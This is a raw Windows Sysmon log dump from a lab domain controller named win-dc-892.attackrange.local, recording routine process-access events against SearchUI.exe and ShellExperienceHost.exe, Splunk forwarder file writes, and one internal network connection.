12:05:57.909{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009784Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:57.909{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009783Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:57.909{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009782Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:57.909{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009781Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.909{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a344|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009780Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:57.909{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009779Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.909{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009778Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:57.909{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000009777Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:57.909{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000009776Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:57.909{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000009775Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:57.909{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009774Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.909{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009773Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:57.909{266CAFBE-64C5-6064-A500-00000000AE01}43566348C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009772Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.909{266CAFBE-64C5-6064-A500-00000000AE01}43566348C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000009771Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.613{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82774E5738D3F66F7DAA18A449CB2403,SHA256=984C2D5DF8F973E425AA34910FEC16FCB1F5AF6BAD669AF1E0799728F49A567B,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000009803Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:59.003{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1361FBA83374A2FC698BF0B3F73A778,SHA256=777F277A6387F19700FE2A1A5F25BA86120A4BFEC303C20CD4A9892F071AD6C1,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000009805Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:00.799{266CAFBE-64C4-6064-9E00-00000000AE01}3120C:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCookies\container.dat2021-03-31 12:06:00.799 23542300x80000000000000009804Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:00.034{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=245CE6D3B24BA9054784D6A84A87F398,SHA256=02888D8FBFF3E758768F8704F4C7BB5138697611915B67283F87C14E295DAE0C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009840Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:00.603{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53647-false10.0.1.12-8000- 10341000x80000000000000009839Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:01.689{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000009838Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:01.689{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000009837Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:01.689{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000009836Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:01.689{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000009835Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:01.689{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000009834Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:01.689{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 11241100x80000000000000009833Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 